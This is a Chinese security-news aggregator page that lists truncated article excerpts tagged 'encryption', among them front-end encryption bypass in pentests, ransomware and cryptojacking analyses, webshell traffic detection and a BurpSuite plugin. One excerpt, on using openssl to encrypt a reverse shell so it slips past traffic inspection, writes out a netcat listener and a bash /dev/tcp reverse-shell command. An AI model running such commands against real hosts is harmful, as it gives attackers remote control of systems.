记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

浅析前端加密后数据包的修改方法

*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 前言 渗透测试过程中,使用BurpSuite对Web站点进行数据包拦截时,有时会遇到应用程序在前端对数据进行了加密后再传输,导致拦截或监听到的数据包为密文的形式。 如下图所示。 此时,我们如何对数据包进行修改,从而进行正常的渗透测试流程呢? 要做到对前端加密数据的修改,有两种思路: (1)从网站的前端JS代码中查找加密函数,有些站点的加密方式较为简单,通过审计前端JS逻辑代码可以直接破解,从而对密文进行解密后做修改,最后再重新加密并发送; (2)中断程序的执行,直接在前端JS代码对明文数据进行加密前,对明文数据进行更改。 显然,第二种思路更具有通用性,本文将介绍两种实现该思路的方法。 前端断点拦截 1、来看看本次测试的站点和功能,为某支付平台的交易记
发布时间:2020-01-07 12:20 | 阅读:5417 | 评论:0 | 标签:加密

加密劫持的潜在风险

对于任何企业而言,隐私和安全性始终是关注的焦点。攻击者试图渗透到公司系统并窃取重要业务和客户信息,攻击的种类层出不穷,攻击速度也越来越快。网络攻击似乎永不停歇。鉴于某些攻击造成的泄密对公众影响广泛,高管和IT专业人员因此很容易将注意力集中在最热门的攻击种类上。然而,许多行业研究发现,一种称为“加密劫持”的威胁,悄无声息地增长,且其速度比任何其他类型的网络事件都快。 加密劫持是一种破坏行为,恶意软件安装到联网设备上(从电话、游戏机到组织服务器的任何设备),安装后,该恶意软件会利用劫持的计算能力在用户不知情的情况下“挖掘”加密货币。 与网络钓鱼或勒索软件攻击不同,加密劫持几乎在感染设备的后台默默运行,因此,加密劫持攻击的增加主要是在雷达下进行的。然而,新的研究表明,自2017年以来,此类攻击已增加
发布时间:2019-12-20 17:20 | 阅读:8156 | 评论:0 | 标签:加密

冰蝎动态二进制加密WebShell基于流量侧检测方案

概述 冰蝎是一款新型动态二进制加密网站工具。目前已经有6个版本。对于webshell的网络流量侧检测,主要有三个思路。一:webshell上传过程中文件还原进行样本分析,检测静态文件是否报毒。二:webshell上线或建立连接过程的数据通信流量。三:webshell已连接后执行远程控制命令过程的数据通信流量。本文通过分析多个历史冰蝎版本及五种脚本(asp|aspx|jsp|jspx|php),结合第二点检测冰蝎上线的静态特征,并总结部分snort规则。 冰蝎通讯原理 冰蝎采用AES加密,很多文章已有介绍,并有对应解密脚本,这里不再赘述。 冰蝎上线数据包 V1.0版本冰蝎连接 抓取到的通信流量如下: Content-Type: applic
发布时间:2019-12-08 12:20 | 阅读:11054 | 评论:0 | 标签:加密

CrySiS勒索病毒最新变种来袭,加密后缀为kharma

CrySiS勒索病毒,又称Dharma,首次出现是在2016年,2017年5月此勒索病毒万能密钥被公布之后,之前的样本可以解密,导致此勒索病毒曾消失了一段时间,不过随后又马上出现了它的一款最新的变种样本,加密后缀为java,通过RDP暴力破解的方式进入受害者服务器进行加密勒索,此勒索病毒加密算法采用AES+RSA方式进行加密,导致加密后的文件无法解密,在最近一年的时间里,这款勒索病毒异常活跃,变种已经达到一百多个,近日国外安全研究人员发现这款勒索病毒的最新的变种,与以往变种不一样,这款最新的变种使用NET语言进行编写,加密后的文件后缀为kharma,之所以采用NET语言进行编写,可能也是为了逃避杀毒软件的检测 安全研究人员公布的最新的CrySiS勒索病毒,如下所示: 从app.any.run上下载到相应的样本
发布时间:2019-12-06 12:20 | 阅读:12890 | 评论:0 | 标签:加密

微软披露加密劫持恶意软件Dexphot,已感染近80000台设备

2018年10月,微软检测到恶意挖矿软件Dexphot的大规模分发行动。Dexphot使用了各种复杂的方法来逃避安全解决方案,包括多层混淆、加密和随机文件名来隐藏安装过程,利用无文件技术在内存中直接运行恶意代码,劫持合法的系统进程来掩盖恶意活动。Dexphot最终目的是在设备上运行加密货币挖掘程序,当用户试图删除恶意软件时,监控服务和预定任务会触发二次感染。微软表示自2018年10月以来不断有Windows设备受到感染,并在今年6月中旬达到峰值的8万多台,自微软部署提高检测率的相关策略和攻击阻止后,每天感染的设备数量开始逐渐下降。复杂的攻击链Dexphot感染的早期阶段涉及许多文件和步骤。在执行阶段,Dexphot首先
发布时间:2019-11-28 13:25 | 阅读:13894 | 评论:0 | 标签:Web安全 Dexphot 恶意挖矿软件 exp 加密

前端加密后的一次渗透测试

*郑重声明:文中涉及的方法,只为交流学习之用。如有人用于非法用途,产生的后果笔者不负任何责任。 0×00前言 在做一次渗透测试项目中,发现使用BurpSuite抓到的包都是经过加密的,加密后的字符串类似base64编码方式,遂采用base64尝试解码,然而并没有解出来…那该怎么办呢?放弃吗?不可能!作为一个二十一世纪的大好青年,怎么能轻易说放弃!(不做项目会被辞退的)于是便有了此文! 0×01 发现加密 在测试过程中使用BurpSuite进行抓包,发现抓到的包为如下类型: 看到蓝色字符串后面为==,想到了base64编码,于是尝试解码,无果… 想到从前端js查看如何进行加密,F12打开开发者工具,然后使用Ctrl+Shift+F全局搜索encrypt: 双击打开,发现如下JS代码,原
发布时间:2019-11-21 12:20 | 阅读:11636 | 评论:0 | 标签:加密

使用卷序列号作为加密密钥:APT恶意软件LOWKEY分析

概述在2019年8月,FireEye发布了有关最新发现的威胁组织——APT41的“Double Dragon”报告。APT41是一个与亚洲某国家联系紧密的双重间谍组织,聚焦于财务领域,该恶意组织主要针对游戏、医疗保健、高科技、高等教育、电信和旅游服务等行业。本文主要分析了我们发现的一个复杂、被动型后门,在关于APT41的报告中曾经提到,并且在最近的FireEye Cyber Defense Summit会议上与大家进行了分享。我们观察到,LOWKEY被用于一些针对性非常强的实际攻击之中,并利用仅能在特定系统上运行的Payload。文章中还使用了其他恶意软件家族名称,并进行了简要描述。有关APT41使用的恶意软件的完整概
发布时间:2019-11-13 13:10 | 阅读:19965 | 评论:0 | 标签:恶意软件 技术 加密

Apple Mail明文保存加密邮件

苹果公司IT专家Bob Gendler今年早些时间发现macOS上的Apple Mail app以明文的形式将加密邮件保存在snippets.db数据库中,目前还没有被修复。Gendler早在今年7月就将该问题告诉了公司,截至目前苹果公司还没有官方发布漏洞修复的时间轴,但据The Verge的消息,补丁即将修复。APPLE MAIL + SIRI = BAD该漏洞的来源是因为Siri的一个允许苹果语音助手提供联系人信息的功能。Gendler说,Siri使用了一个名为suggestd的进程来为不同的app提供通讯录信息。不管进程发现了什么都会保存在snippets.db文件中,以防用户想要使用联系人推荐的功能。研究发现如
发布时间:2019-11-11 13:10 | 阅读:52911 | 评论:0 | 标签:Web安全 Apple Mail 加密

基于机器学习的恶意软件加密流量检测

1 概述 近年来随着HTTPS的全面普及,为了确保通信安全和隐私,越来越多的网络流量开始采用HTTPS加密,截止今日,超过65%的网络流量已使用https加密。 HTTPS的的推出,主要是为了应对各种窃听和中间人攻击,以在不安全的网络上建立唯一安全的信道,并加入数据包加密和服务器证书验证。但是随着所有互联网中加密网络流量的增加,恶意软件也开始使用HTTPS来保护自己的通信。 这种情况对安全分析人员构成了挑战,因为流量是加密的,而且大多数情况下看起来像正常的流量。 检测企业内部HTTPS流量的一种常见的解决方案是安装HTTPS拦截代理。 这些硬件服务器可以通过在其计算机中安装特殊证书来打开和检查员工的HTTPS流量。 HTTPS拦截器位于客户端和服务器之间,其中加密流量被解密,扫描恶意软件后,再次加密并发送到目标
发布时间:2019-10-25 17:30 | 阅读:33006 | 评论:0 | 标签:加密

Graboid:首例在Docker Hub映像中发现的加密劫持蠕虫

概要Unit 42的研究人员发现了一种名为“Graboid”的新型加密劫持蠕虫,该病毒能通过恶意Docker镜像传播,现已感染2,000多个Docker主机。这也是首次发现使用Docker Engine(社区版)中的容器传播的加密劫持蠕虫。由于大多数传统的端点保护软件都不检查容器内的数据和活动,因此这种恶意活动可能很难检测到。最初的立足点由攻击者通过不安全的Docker守护进程获得,在守护进程中首先安装Docker映像以在受感染的主机上运行,用于挖掘加密货币的恶意软件从C2服务器下载,恶意软件能定期从C2查询新的易受损主机,并随机选择下一个目标传播。分析显示,平均每个矿工的活动时间为63%,每个采矿周期持续250秒。蠕
发布时间:2019-10-18 13:10 | 阅读:19053 | 评论:0 | 标签:系统安全 docker Graboid 加密劫持 加密

窃取加密货币的新型木马:InnfiRAT

背景近日,国外安全研究人员曝光了一种名为InnfiRAT的新型木马,该木马使用.NET编写,具有窃取用户信息、抓取浏览器Cookie用于窃取密码、屏幕截取、下载执行其他恶意文件等行为。除此之外,该木马还会查找主机上的加密货币钱包信息,用于窃取加密货币(莱特币和比特币)。功能分析木马进程首先检测自身路径是否为%AppData%NvidiaDriver.exe,并且终止名为NvidiaDriver.exe的进程,将自身复制到%AppData%NvidiaDriver.exe再次执行:以NvidiaDriver.exe重新运行后,会拼接一段base64编码的数据,解码后是一个PE文件,加载到内存中执行:获取主机信息,检查Ma
发布时间:2019-09-19 13:10 | 阅读:19637 | 评论:0 | 标签:加密货币 InnfiRAT 加密

一个用于加密传输爆破的BurpSuite插件:jsEncrypter

jsEncrypterjsEncrypter是一个BurpSuite插件,使用phantomjs调用前端加密函数对数据进行加密,方便对加密数据输入点进行fuzz。jsEncrypter下载1:直接在releases下载2:自行编译:git clone https://github.com/c0ny1/jsEncrypter.gitmvn package12git clone https://github.com/c0ny1/jsEncrypter.gitmvn package jsEncrypter安装jsEncrypter插件使用运行靶机项目提供了一个用php编写的靶机(jsEncrypter/server),靶机提供了7个算法对密码进行加密后传输,后台解密,最后进行密码匹配。base64md5sha1sha
发布时间:2019-09-07 12:45 | 阅读:34551 | 评论:0 | 标签:加密

微信聊天安全加密插件,类似Telegram的端对端安全加密:TgWechat

TgWechat 微信聊天安全加密插件仅供个人消遣玩耍,请勿用于非法或者商业用途。若用于非法用途,一切后果由使用者承担,与软件作者无关一款采用Telegram类似的安全加密方案实现的保护个人隐私安全的微信聊天插件。自由切换/端对端加密/安全可靠。不同聊天对象生成不同加密密钥。随意启用或关闭加密功能。传输到微信服务器聊天内容是加密的(不怕私密暴露),本地保存内容明文(方便查看)。不过目前仅支持Windows。功能默认支持多开支持个人聊天文本内容加密支持内置表情加密支持两人群聊(测试功能,多人聊天还在调试中)TgWechat 使用下载安装地址:https://github.com/dplusec/tgwechat下载并打开TgWechat.exe进行快捷安装,还支持更新、卸载、多开微信。使用登陆微信后,进入正常聊天
发布时间:2019-09-05 13:00 | 阅读:37888 | 评论:0 | 标签:加密

针对某区块链数字加密币交易平台发起的APT攻击

一、概述近日,腾讯安全御见威胁情报中心捕获到一起针对某大型数字加密币交易平台客服人员发起的鱼叉式定向攻击。攻击者自称为币圈资深用户,由于对该交易平台客服不满,进而对比了该平台与其竞争关系的xx平台,并列出多条建议在邮件附件中,希望该平台做出改进。邮件附件中包含了一个名为“客服和xx投诉对比和记录2019.xls”的电子表格文件,该文件为攻击诱饵文件,携带Excel 4.0 XLM宏代码,当接收邮件的客服人员打开该文件,且允许执行其中的宏代码,宏代码将拉取一个伪装为HelloWorld的恶意程序执行,最终经过多层恶意代码解密,执行Cobalt Strike远控后门。针对数字加密币公司的定向攻击流程一旦客服人员机器被成功植
发布时间:2019-08-29 18:10 | 阅读:31724 | 评论:0 | 标签:行业 APT攻击 加密

利用openssl加密你的shell

利用openssl加密你的shell 在我们实际的渗透测试过程中,总是有各种各样的流量审查设备挡住我们通往system的道路,尤其是在反弹shell的时候,明文传输的shell总是容易断,那么本文介绍一种利用openssl反弹流量加密的shell来绕过流量审查设备。 常规bash反弹 vps执行 nc -lvvp 4444 目标主机执行 bash -i >& /dev/tcp/172.16.1.1/4444 0>&1 流量明文传输,很容易被拦截。 openssl加密传输 第一步,在vps上生成SSL证书的公钥/私钥对 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
发布时间:2019-08-26 17:15 | 阅读:34446 | 评论:0 | 标签:加密

ERIS勒索病毒变种来袭,被加密的文件暂无法解密

一、概述腾讯安全御见威胁情报中心监测到,ERIS勒索病毒变种在国内有部分感染。ERIS勒索变种使用go语言编写,加密文件完成后会添加5字节的随机扩展后缀。病毒加密用户数据之后勒索0.05比特币(市值约4000元人民币)。由于该病毒使用RSA+Salsa20对文件进行加密,被加密后的文件暂时无法解密。ERIS勒索病毒为防止用户利用反删除工具恢复文件,该病毒会调用磁盘擦除工具cipher.exe将病毒完成数据加密后删除的原文件彻底破坏,使用户恢复数据的最后希望彻底破灭,我们提醒政企机构高度警惕,腾讯电脑管家、腾讯御点终端安全管理系统均可拦截该病毒。ERIS勒索病毒首次出现于2019年5月,该勒索家族病毒擅长通过垃圾邮件,L
发布时间:2019-08-09 17:25 | 阅读:56482 | 评论:0 | 标签:勒索软件 ERIS 加密

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云